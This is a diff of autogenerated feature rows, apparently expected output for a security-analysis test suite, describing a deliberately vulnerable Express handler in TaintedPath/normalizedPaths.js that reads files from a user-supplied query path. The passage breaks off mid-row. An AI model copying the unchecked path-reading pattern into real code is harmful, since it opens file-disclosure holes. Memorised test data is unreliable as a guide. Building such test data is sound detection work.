autogenerated/TaintedPath/normalizedPaths.js:253:9:253:30 | '/relat ... tswith' | calleeImports | express | @@ -8931,6 +76107,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:253:9:253:30 | '/relat ... tswith' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:253:9:253:30 | '/relat ... tswith' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:253:9:253:30 | '/relat ... tswith' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:253:32 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | (req, r ... \\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | (req, r ... \\n }\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | (req, r ... \\n }\\n} | calleeImports | express | @@ -8938,11 +76129,81 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | (req, r ... \\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | (req, r ... \\n }\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | (req, r ... \\n }\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:33:298:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:34:253:36 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:253:39:253:41 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:253:39:253:41 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:253:39:253:41 | res | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:253:39:253:41 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:253:39:253:41 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:10 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path = ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:23 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:31 | pathModule.resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:31 | pathModule.resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:31 | pathModule.resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:31 | pathModule.resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:31 | pathModule.resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | | autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:25:254:31 | resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:25:254:31 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:25:254:31 | resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:25:254:31 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:25:254:31 | resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:35 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:35 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:35 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:41 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:41 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:41 | req.query | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:41 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:33:254:41 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:254:33:254:46 | req.query.path | CalleeFlexibleAccessPath | pathModule.resolve | | autogenerated/TaintedPath/normalizedPaths.js:254:33:254:46 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:254:33:254:46 | req.query.path | calleeImports | path | @@ -8952,6 +76213,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:254:33:254:46 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:254:33:254:46 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:254:33:254:46 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:254:37:254:41 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:37:254:41 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:37:254:41 | query | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:37:254:41 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:37:254:41 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:254:43:254:46 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:254:43:254:46 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:254:43:254:46 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:254:43:254:46 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:254:43:254:46 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:256:3:256:4 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath 